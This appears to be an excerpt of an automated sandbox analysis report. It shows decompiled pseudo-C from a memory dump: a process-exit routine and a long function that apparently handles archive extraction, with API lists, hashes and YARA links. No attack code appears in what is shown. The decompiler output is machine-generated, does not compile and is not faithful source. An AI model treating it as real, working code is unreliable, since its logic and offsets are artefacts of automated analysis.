C-Code - Quality: 100%

			E0018753D(int _a4) {
				void* _t14;
				void* _t16;

				if(E0018A836(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E001875C2(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x00187549
0x00187565
0x00187565
0x0018756e
0x00187577

APIs

GetCurrentProcess.KERNEL32(00000000,?,00187513,00000000,0019BAD8,0000000C,0018766A,00000000,00000002,00000000), ref: 0018755E
TerminateProcess.KERNEL32(00000000,?,00187513,00000000,0019BAD8,0000000C,0018766A,00000000,00000002,00000000), ref: 00187565
ExitProcess.KERNEL32 ref: 00187577

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 55d5e23fb01e5529b887108b66e185f43eb0bc4c53377f9e9757702cb21cfbaa
Instruction ID: d45726ee57c43cb6ec1894723f880d1ed1253a151c2c4e2c518e388b7ec2ee76
Opcode Fuzzy Hash: 55d5e23fb01e5529b887108b66e185f43eb0bc4c53377f9e9757702cb21cfbaa
Instruction Fuzzy Hash: 71E0EC35004548AFCF11BF64DD09A497F69EF51746F248425F9158A672CB35DF82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0016857B, Relevance: 3.9, APIs: 2, Instructions: 947
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E0016857B(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t371;
				signed int _t375;
				signed int _t376;
				signed int _t381;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t394;
				signed int _t395;
				signed int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t410;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t434;
				char _t436;
				char _t438;
				signed int _t439;
				signed int _t440;
				signed int _t463;
				signed int _t472;
				intOrPtr _t475;
				char _t482;
				signed int _t483;
				void* _t494;
				void* _t502;
				void* _t504;
				signed int _t514;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t523;
				signed int _t526;
				signed int _t534;
				signed int _t544;
				signed int _t546;
				signed int _t548;
				signed int _t550;
				signed char _t551;
				signed int _t554;
				void* _t559;
				signed int _t567;
				intOrPtr* _t578;
				intOrPtr _t580;
				signed int _t581;
				signed int _t591;
				intOrPtr _t594;
				signed int _t597;
				signed int _t606;
				signed int _t613;
				signed int _t615;
				signed int _t616;
				signed int _t619;
				signed int _t637;
				signed int _t638;
				void* _t645;
				void* _t646;
				signed int _t662;
				signed int _t673;
				intOrPtr _t674;
				void* _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t687;
				intOrPtr _t689;
				signed int _t694;
				intOrPtr _t696;
				signed int _t699;
				signed int _t704;
				void* _t708;
				void* _t710;
				void* _t712;

				_t580 = __ecx;
				E0017E28C(E00191E4A, _t708);
				E0017E360();
				_t578 =  *((intOrPtr*)(_t708 + 8));
				_t672 = 0;
				_t689 = _t580;
				 *((intOrPtr*)(_t708 - 0x20)) = _t689;
				_t371 =  *( *(_t689 + 8) + 0x82fa) & 0x0000ffff;
				 *(_t708 - 0x18) = _t371;
				if( *((intOrPtr*)(_t708 + 0xc)) != 0) {
					L6:
					_t696 =  *((intOrPtr*)(_t578 + 0x21dc));
					__eflags = _t696 - 2;
					if(_t696 == 2) {
						 *(_t689 + 0x10f7) = _t672;
						__eflags =  *(_t578 + 0x32dc) - _t672;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t578 + 0x32e4) - _t672;
							if(__eflags > 0) {
								L26:
								_t581 =  *(_t689 + 8);
								__eflags =  *((intOrPtr*)(_t581 + 0x6160)) - _t672;
								if( *((intOrPtr*)(_t581 + 0x6160)) != _t672) {
									L29:
									 *(_t708 - 0x13) = _t672;
									_t35 = _t708 - 0x51ac; // -18860
									_t36 = _t708 - 0x13; // 0x7ed
									_t375 = E00165E3A(_t578 + 0x2280, _t36, 6, _t672, _t35, 0x800);
									__eflags = _t375;
									_t376 = _t375 & 0xffffff00 | _t375 != 0x00000000;
									 *(_t708 - 0x12) = _t376;
									__eflags = _t376;
									if(_t376 != 0) {
										__eflags =  *(_t708 - 0x13);
										if( *(_t708 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t689 + 0xf1)) = 0;
										}
									}
									E00162071(_t578);
									_push(0x800);
									_t43 = _t708 - 0x113c; // -2364
									_push(_t578 + 0x22a8);
									E0016B2E3();
									__eflags =  *((char*)(_t578 + 0x3373));
									 *(_t708 - 0x1c) = 1;
									if( *((char*)(_t578 + 0x3373)) == 0) {
										_t381 = E0016215B(_t578);
										__eflags = _t381;
										if(_t381 == 0) {
											_t551 =  *(_t689 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t551 + 0x72c4));
											asm("sbb al, al");
											_t61 = _t708 - 0x12;
											 *_t61 =  *(_t708 - 0x12) &  !_t551;
											__eflags =  *_t61;
										}
									} else {
										_t554 =  *( *(_t689 + 8) + 0x72c4);
										__eflags = _t554 - 1;
										if(_t554 != 1) {
											__eflags =  *(_t708 - 0x13);
											if( *(_t708 - 0x13) == 0) {
												__eflags = _t554;
												 *(_t708 - 0x12) =  *(_t708 - 0x12) & (_t554 & 0xffffff00 | _t554 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t708 - 0x113c; // -2364
												_t559 = E0016BC34(_t54);
												_t662 =  *(_t689 + 8);
												__eflags =  *((intOrPtr*)(_t662 + 0x72c4)) - 1 - _t559;
												if( *((intOrPtr*)(_t662 + 0x72c4)) - 1 != _t559) {
													 *(_t708 - 0x12) = 0;
												} else {
													_t57 = _t708 - 0x113c; // -2364
													_push(1);
													E0016BC34(_t57);
												}
											}
										}
									}
									 *((char*)(_t689 + 0x5f)) =  *((intOrPtr*)(_t578 + 0x3319));
									 *((char*)(_t689 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *0x193260( *((intOrPtr*)(_t578 + 0x6ca8)) -  *(_t578 + 0x32d8),  *((intOrPtr*)(_t578 + 0x6cac)), 0);
									 *((intOrPtr*)( *_t578 + 0x10))();
									_t673 = 0;
									_t387 = 0;
									 *(_t708 - 0xe) = 0;
									 *(_t708 - 0x24) = 0;
									__eflags =  *(_t708 - 0x12);
									if( *(_t708 - 0x12) != 0) {
										L43:
										_t699 =  *(_t708 - 0x18);
										_t591 =  *((intOrPtr*)( *(_t689 + 8) + 0x6201));
										_t389 = 0x49;
										__eflags = _t591;
										if(_t591 == 0) {
											L45:
											_t390 = _t673;
											L46:
											__eflags = _t591;
											_t83 = _t708 - 0x113c; // -2364
											_t394 = L00171375(_t591, _t83, (_t390 & 0xffffff00 | _t591 == 0x00000000) & 0x000000ff, _t390,  *(_t708 - 0x24)); // executed
											__eflags = _t394;
											if(__eflags == 0) {
												L219:
												_t395 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
												return _t395;
											}
											_push(0x800);
											 *((intOrPtr*)(_t708 - 0x38)) = _t689 + 0x10f8;
											_t86 = _t708 - 0x113c; // -2364
											E0016826A(__eflags, _t578, _t86, _t689 + 0x10f8);
											__eflags =  *(_t708 - 0xe);
											if( *(_t708 - 0xe) != 0) {
												L50:
												 *(_t708 - 0xd) = 0;
												L51:
												_t400 =  *(_t689 + 8);
												_t594 = 0x45;
												__eflags =  *((char*)(_t400 + 0x6157));
												_t674 = 0x58;
												 *((intOrPtr*)(_t708 - 0x34)) = _t594;
												 *((intOrPtr*)(_t708 - 0x30)) = _t674;
												if( *((char*)(_t400 + 0x6157)) != 0) {
													L53:
													__eflags = _t699 - _t594;
													if(_t699 == _t594) {
														L55:
														_t97 = _t708 - 0x31ac; // -10668
														E001670BF(_t97);
														_push(0);
														_t98 = _t708 - 0x31ac; // -10668
														_t405 = E0016A4C6(_t97, _t674, __eflags, _t689 + 0x10f8, _t98);
														__eflags = _t405;
														if(_t405 == 0) {
															_t406 =  *(_t689 + 8);
															__eflags =  *((char*)(_t406 + 0x6157));
															_t109 = _t708 - 0xd;
															 *_t109 =  *(_t708 - 0xd) & (_t406 & 0xffffff00 |  *((char*)(_t406 + 0x6157)) != 0x00000000) - 0x00000001;
															__eflags =  *_t109;
															L61:
															_t111 = _t708 - 0x113c; // -2364
															_t410 = E00167D6C(_t111, _t578, _t111);
															__eflags = _t410;
															if(_t410 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t578 + 0x331b));
																	if( *((char*)(_t578 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t116 = _t708 - 0x113c; // -2364
																	_t544 = E00168236(_t689, _t578);
																	__eflags = _t544;
																	if(_t544 == 0) {
																		 *((char*)(_t689 + 0x20f8)) = 1;
																		goto L219;
																	}
																	L65:
																	_t118 = _t708 - 0x13c; // 0x6c4
																	_t702 =  *(_t689 + 8) + 0x5024;
																	_t597 = 0x40;
																	memcpy(_t118,  *(_t689 + 8) + 0x5024, _t597 << 2);
																	_t712 = _t710 + 0xc;
																	asm("movsw");
																	_t121 = _t708 - 0x28; // 0x7d8
																	_t689 =  *((intOrPtr*)(_t708 - 0x20));
																	 *(_t708 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t128 = _t708 - 0x13c; // 0x6c4
																	E0016C991(_t689 + 0x10, 0,  *((intOrPtr*)(_t578 + 0x331c)), _t128,  ~( *(_t578 + 0x3320) & 0x000000ff) & _t578 + 0x00003321, _t578 + 0x3331,  *((intOrPtr*)(_t578 + 0x336c)), _t578 + 0x334b, _t121);
																	__eflags =  *((char*)(_t578 + 0x331b));
																	if( *((char*)(_t578 + 0x331b)) == 0) {
																		L73:
																		 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																		_t147 = _t708 - 0x13c; // 0x6c4
																		L0016EAB4(_t147);
																		_t148 = _t708 - 0x2164; // -6500
																		E00169619(_t148);
																		_t420 =  *(_t578 + 0x3380);
																		 *(_t708 - 4) = 1;
																		 *(_t708 - 0x2c) = _t420;
																		_t676 = 0x50;
																		__eflags = _t420;
																		if(_t420 == 0) {
																			L83:
																			_t421 = E0016215B(_t578);
																			__eflags = _t421;
																			if(_t421 == 0) {
																				_t606 =  *(_t708 - 0xd);
																				__eflags = _t606;
																				if(_t606 == 0) {
																					_t702 =  *(_t708 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t578 + 0x6cb4));
																					if( *((char*)(_t578 + 0x6cb4)) == 0) {
																						__eflags = _t606;
																						if(_t606 == 0) {
																							L212:
																							 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																							_t359 = _t708 - 0x2164; // -6500
																							E00169653(_t359, _t702);
																							__eflags =  *(_t708 - 0x12);
																							_t387 =  *(_t708 - 0xd);
																							_t677 =  *(_t708 - 0xe);
																							if( *(_t708 - 0x12) != 0) {
																								_t363 = _t689 + 0xec;
																								 *_t363 =  *(_t689 + 0xec) + 1;
																								__eflags =  *_t363;
																							}
																							L214:
																							__eflags =  *((char*)(_t689 + 0x60));
																							if( *((char*)(_t689 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t387;
																							if(_t387 != 0) {
																								L15:
																								_t395 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t578 + 0x6cb4)) - _t387;
																							if( *((intOrPtr*)(_t578 + 0x6cb4)) != _t387) {
																								__eflags = _t677;
																								if(_t677 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00161EDA(_t578);
																							goto L15;
																						}
																						L101:
																						_t424 =  *(_t689 + 8);
																						__eflags =  *((char*)(_t424 + 0x6201));
																						if( *((char*)(_t424 + 0x6201)) == 0) {
																							L103:
																							_t425 =  *(_t708 - 0xe);
																							__eflags = _t425;
																							if(_t425 != 0) {
																								L108:
																								 *((char*)(_t708 - 0x11)) = 1;
																								__eflags = _t425;
																								if(_t425 != 0) {
																									L110:
																									 *((intOrPtr*)(_t689 + 0xe8)) =  *((intOrPtr*)(_t689 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t689 + 0x80)) = 0;
																									 *((intOrPtr*)(_t689 + 0x84)) = 0;
																									 *((intOrPtr*)(_t689 + 0x88)) = 0;
																									 *((intOrPtr*)(_t689 + 0x8c)) = 0;
																									E0016AA88(_t689 + 0xc8, _t676,  *((intOrPtr*)(_t578 + 0x32f0)),  *((intOrPtr*)( *(_t689 + 8) + 0x82e0))); // executed
																									E0016AA88(_t689 + 0xa0, _t676,  *((intOrPtr*)(_t578 + 0x32f0)),  *((intOrPtr*)( *(_t689 + 8) + 0x82e0)));
																									_t702 = _t689 + 0x10;
																									 *(_t689 + 0x30) =  *(_t578 + 0x32d8);
																									_t218 = _t708 - 0x2164; // -6500
																									 *(_t689 + 0x34) =  *(_t578 + 0x32dc);
																									E0016C9D9(_t702, _t578, _t218);
																									_t678 =  *((intOrPtr*)(_t708 - 0x11));
																									_t613 = 0;
																									_t434 =  *(_t708 - 0xe);
																									 *((char*)(_t689 + 0x39)) = _t678;
																									 *((char*)(_t689 + 0x3a)) = _t434;
																									 *(_t708 - 0x24) = 0;
																									 *(_t708 - 0x1c) = 0;
																									__eflags = _t678;
																									if(_t678 != 0) {
																										L127:
																										_t679 =  *(_t689 + 8);
																										__eflags =  *((char*)(_t679 + 0x61a0));
																										 *((char*)(_t708 - 0x214b)) =  *((char*)(_t679 + 0x61a0)) == 0;
																										__eflags =  *((char*)(_t708 - 0x11));
																										if( *((char*)(_t708 - 0x11)) != 0) {
																											L131:
																											_t436 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t708 - 0x2c);
																											 *((char*)(_t708 - 0x10)) = _t613;
																											 *((char*)(_t708 - 0x14)) = _t436;
																											 *((char*)(_t708 - 0xf)) = _t436;
																											if( *(_t708 - 0x2c) == 0) {
																												__eflags =  *(_t578 + 0x3318);
																												if( *(_t578 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t578 + 0x22a0));
																													if(__eflags != 0) {
																														E00172C42(_t578,  *((intOrPtr*)(_t689 + 0xe0)), _t708,  *((intOrPtr*)(_t578 + 0x3374)),  *(_t578 + 0x3370) & 0x000000ff);
																														_t475 =  *((intOrPtr*)(_t689 + 0xe0));
																														 *(_t475 + 0x4c48) =  *(_t578 + 0x32e0);
																														__eflags = 0;
																														 *(_t475 + 0x4c4c) =  *(_t578 + 0x32e4);
																														 *((char*)(_t475 + 0x4c60)) = 0;
																														E001728F1( *((intOrPtr*)(_t689 + 0xe0)),  *((intOrPtr*)(_t578 + 0x229c)),  *(_t578 + 0x3370) & 0x000000ff);
																													} else {
																														_push( *(_t578 + 0x32e4));
																														_push( *(_t578 + 0x32e0));
																														_push(_t702); // executed
																														E001692E6(_t578, _t679, _t689, __eflags); // executed
																													}
																												}
																												L163:
																												E00161EDA(_t578);
																												__eflags =  *((char*)(_t578 + 0x3319));
																												if( *((char*)(_t578 + 0x3319)) != 0) {
																													L166:
																													_t438 = 0;
																													__eflags = 0;
																													_t615 = 0;
																													L167:
																													__eflags =  *(_t578 + 0x3370);
																													if( *(_t578 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t578 + 0x22a0));
																														if( *((char*)(_t578 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t708 - 0xe);
																															 *((char*)(_t708 - 0x10)) = _t438;
																															if( *(_t708 - 0xe) != 0) {
																																L185:
																																__eflags =  *(_t708 - 0x2c);
																																_t680 =  *((intOrPtr*)(_t708 - 0xf));
																																if( *(_t708 - 0x2c) == 0) {
																																	L189:
																																	_t616 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t708 - 0x11));
																																	if( *((char*)(_t708 - 0x11)) != 0) {
																																		goto L212;
																																	}
																																	_t702 =  *(_t708 - 0x18);
																																	__eflags = _t702 -  *((intOrPtr*)(_t708 - 0x30));
																																	if(_t702 ==  *((intOrPtr*)(_t708 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t708 - 0x2c);
																																		if( *(_t708 - 0x2c) == 0) {
																																			L197:
																																			__eflags = _t438;
																																			if(_t438 == 0) {
																																				L200:
																																				__eflags = _t616;
																																				if(_t616 != 0) {
																																					L208:
																																					_t439 =  *(_t689 + 8);
																																					__eflags =  *((char*)(_t439 + 0x61a8));
																																					if( *((char*)(_t439 + 0x61a8)) == 0) {
																																						_t702 = _t689 + 0x10f8;
																																						_t440 = E0016A444(_t689 + 0x10f8,  *((intOrPtr*)(_t578 + 0x22a4))); // executed
																																						__eflags = _t440;
																																						if(__eflags == 0) {
																																							E0017F190(E00161F94(__eflags, 0x11, _t578 + 0x24, _t702));
																																						}
																																					}
																																					 *(_t689 + 0x10f7) = 1;
																																					goto L212;
																																				}
																																				_t681 =  *(_t708 - 0x1c);
																																				__eflags = _t681;
																																				_t619 =  *(_t708 - 0x24);
																																				if(_t681 > 0) {
																																					L203:
																																					__eflags = _t438;
																																					if(_t438 != 0) {
																																						L206:
																																						_t332 = _t708 - 0x2164; // -6500
																																						E00169EBF(_t332);
																																						L207:
																																						_t702 = _t578 + 0x32d0;
																																						_t694 = _t578 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t340 = _t708 - 0x2164; // -6500
																																						E00169D62(_t340, _t578 + 0x32d0,  ~( *( *(_t689 + 8) + 0x72d0)) & _t694,  ~( *( *(_t689 + 8) + 0x72d4)) & _t578 + 0x000032c8,  ~( *( *(_t689 + 8) + 0x72d8)) & _t578 + 0x000032d0);
																																						_t341 = _t708 - 0x2164; // -6500
																																						E001696D0(_t341);
																																						E00167BD1( *((intOrPtr*)(_t708 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)), _t578,  *((intOrPtr*)(_t708 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694;
																																						E00169D5F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d8)) & _t578 + 0x000032d0);
																																						_t689 =  *((intOrPtr*)(_t708 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t689 + 0x88)) - _t619;
																																					if( *((intOrPtr*)(_t689 + 0x88)) != _t619) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t689 + 0x8c)) - _t681;
																																					if( *((intOrPtr*)(_t689 + 0x8c)) == _t681) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t619;
																																				if(_t619 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t463 =  *(_t689 + 8);
																																			__eflags =  *((char*)(_t463 + 0x61a0));
																																			if( *((char*)(_t463 + 0x61a0)) == 0) {
																																				goto L212;
																																			}
																																			_t438 =  *((intOrPtr*)(_t708 - 0x10));
																																			goto L200;
																																		}
																																		__eflags = _t616;
																																		if(_t616 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t578 + 0x3380) - 5;
																																		if( *(_t578 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t680;
																																		if(_t680 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t702 -  *((intOrPtr*)(_t708 - 0x34));
																																	if(_t702 !=  *((intOrPtr*)(_t708 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t578 + 0x3380) - 4;
																																if( *(_t578 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t680;
																																if(_t680 == 0) {
																																	goto L189;
																																}
																																_t616 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t708 - 0x14));
																															if( *((char*)(_t708 - 0x14)) == 0) {
																																goto L185;
																															}
																															__eflags = _t615;
																															if(_t615 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t578 + 0x331b)) - _t615;
																															if(__eflags == 0) {
																																L183:
																																_t312 = _t708 - 0x113c; // -2364
																																_push(_t578 + 0x24);
																																_push(3);
																																L184:
																																E00161F94(__eflags);
																																 *((char*)(_t708 - 0x10)) = 1;
																																E00166FC6(0x1a0f50, 3);
																																_t438 =  *((intOrPtr*)(_t708 - 0x10));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t578 + 0x3341)) - _t615;
																															if( *((intOrPtr*)(_t578 + 0x3341)) == _t615) {
																																L181:
																																__eflags =  *((char*)(_t689 + 0xf4));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t310 = _t708 - 0x113c; // -2364
																																_push(_t578 + 0x24);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t578 + 0x6cc4) - _t615;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t578 + 0x32e4) - _t438;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t615;
																															if(_t615 != 0) {
																																 *((char*)(_t689 + 0xf4)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t578 + 0x32e0) - _t438;
																														if( *(_t578 + 0x32e0) <= _t438) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t689 + 0xf4)) = _t438;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t472 = E0016AA56(_t689 + 0xc8, _t689, _t578 + 0x32f0,  ~( *(_t578 + 0x334a) & 0x000000ff) & _t578 + 0x0000334b);
																												__eflags = _t472;
																												if(_t472 == 0) {
																													goto L166;
																												}
																												_t615 = 1;
																												_t438 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t578 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_push(0x800);
																												_t263 = _t708 - 0x41ac; // -14764
																												E0016826A(__eflags, _t578, _t578 + 0x3384, _t263);
																												_t613 =  *((intOrPtr*)(_t708 - 0x10));
																												__eflags = _t613;
																												if(_t613 == 0) {
																													L153:
																													_t482 =  *((intOrPtr*)(_t708 - 0xf));
																													L154:
																													__eflags =  *((intOrPtr*)(_t578 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t578 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t613;
																														if(_t613 == 0) {
																															L157:
																															_t483 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t689 + 0x10f7) = _t483;
																															goto L163;
																														}
																														L142:
																														__eflags = _t482;
																														if(_t482 == 0) {
																															goto L157;
																														}
																														_t483 = 1;
																														goto L158;
																													}
																													__eflags = _t613;
																													if(_t613 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t708 - 0x14)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t708 - 0x41ac));
																												if( *((short*)(_t708 - 0x41ac)) == 0) {
																													goto L153;
																												}
																												_t267 = _t708 - 0x41ac; // -14764
																												_push(0x800);
																												_push(_t689 + 0x10f8);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t578 + 0x24);
																													_t270 = _t708 - 0x2164; // -6500
																													_t482 = E00169224(_t679, _t689, _t702, __eflags);
																												} else {
																													_t482 = E00167698(_t613, __eflags);
																												}
																												L151:
																												 *((char*)(_t708 - 0xf)) = _t482;
																												__eflags = _t482;
																												if(_t482 == 0) {
																													L139:
																													_t613 =  *((intOrPtr*)(_t708 - 0x10));
																													goto L140;
																												}
																												_t613 =  *((intOrPtr*)(_t708 - 0x10));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t436;
																											if(_t702 == _t436) {
																												L144:
																												__eflags = _t613;
																												if(_t613 == 0) {
																													goto L153;
																												}
																												_push(_t689 + 0x10f8);
																												_t482 = E00167907(_t679, _t689 + 0x10, _t578);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00161F94(__eflags, 0x47, _t578 + 0x24, _t689 + 0x10f8);
																											__eflags = 0;
																											_t482 = 0;
																											 *((char*)(_t708 - 0xf)) = 0;
																											goto L139;
																										}
																										__eflags = _t434;
																										if(_t434 != 0) {
																											goto L131;
																										}
																										_t494 = 0x50;
																										__eflags =  *(_t708 - 0x18) - _t494;
																										if( *(_t708 - 0x18) == _t494) {
																											goto L131;
																										}
																										_t436 = 1;
																										_t613 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t578 + 0x6cc4);
																									if( *(_t578 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t704 =  *(_t578 + 0x32e4);
																									_t687 =  *(_t578 + 0x32e0);
																									__eflags = _t704;
																									if(__eflags < 0) {
																										L126:
																										_t702 = _t689 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t637 =  *(_t578 + 0x32d8);
																										_t638 = _t637 << 0xa;
																										__eflags = ( *(_t578 + 0x32dc) << 0x00000020 | _t637) << 0xa - _t704;
																										if(__eflags < 0) {
																											L125:
																											_t434 =  *(_t708 - 0xe);
																											_t613 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t704;
																											if(__eflags < 0) {
																												L124:
																												_t238 = _t708 - 0x2164; // -6500
																												E00169B21(_t238,  *(_t578 + 0x32e0),  *(_t578 + 0x32e4));
																												 *(_t708 - 0x24) =  *(_t578 + 0x32e0);
																												 *(_t708 - 0x1c) =  *(_t578 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t502 = E001698E5(_t687);
																												__eflags = _t687 -  *(_t578 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t502 -  *(_t578 + 0x32d8);
																												if(_t502 <=  *(_t578 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t687 - 0x5f5e100;
																											if(_t687 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t638 - _t687;
																										if(_t638 <= _t687) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t687 - 0xf4240;
																									if(_t687 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t199 = _t689 + 0xe4;
																								 *_t199 =  *(_t689 + 0xe4) + 1;
																								__eflags =  *_t199;
																								goto L110;
																							}
																							 *((char*)(_t708 - 0x11)) = 0;
																							_t504 = 0x50;
																							__eflags = _t702 - _t504;
																							if(_t702 != _t504) {
																								_t193 = _t708 - 0x2164; // -6500
																								__eflags = E00169989(_t193);
																								if(__eflags != 0) {
																									E00161F94(__eflags, 0x3b, _t578 + 0x24, _t689 + 0x10f8);
																									E00167061(0x1a0f50, _t708, _t578 + 0x24, _t689 + 0x10f8);
																								}
																							}
																							goto L109;
																						}
																						 *(_t689 + 0x10f7) = 1;
																						__eflags =  *((char*)(_t424 + 0x6201));
																						if( *((char*)(_t424 + 0x6201)) != 0) {
																							_t425 =  *(_t708 - 0xe);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t708 - 0xe) = 1;
																					 *(_t708 - 0xd) = 1;
																					_t183 = _t708 - 0x113c; // -2364
																					_t514 = L00171375(_t606, _t183, 0, 0, 1);
																					__eflags = _t514;
																					if(_t514 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t708 - 0x1c) = 0;
																					L99:
																					_t185 = _t708 - 0x2164; // -6500
																					E00169653(_t185, _t702);
																					_t395 =  *(_t708 - 0x1c);
																					goto L16;
																				}
																				_t175 = _t708 - 0x2164; // -6500
																				_push(_t578);
																				_t518 = E001680EA(_t689);
																				_t702 =  *(_t708 - 0x18);
																				_t606 = _t518;
																				 *(_t708 - 0xd) = _t606;
																				L93:
																				__eflags = _t606;
																				if(_t606 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t708 - 0xd);
																			if( *(_t708 - 0xd) != 0) {
																				_t519 =  *(_t708 - 0x18);
																				__eflags = _t519 - 0x50;
																				if(_t519 != 0x50) {
																					_t645 = 0x49;
																					__eflags = _t519 - _t645;
																					if(_t519 != _t645) {
																						_t646 = 0x45;
																						__eflags = _t519 - _t646;
																						if(_t519 != _t646) {
																							_t520 =  *(_t689 + 8);
																							__eflags =  *((intOrPtr*)(_t520 + 0x615c)) - 1;
																							if( *((intOrPtr*)(_t520 + 0x615c)) != 1) {
																								 *(_t689 + 0xe4) =  *(_t689 + 0xe4) + 1;
																								_t173 = _t708 - 0x113c; // -2364
																								_push(_t578);
																								E00167F26(_t689);
																							}
																						}
																					}
																				}
																			}
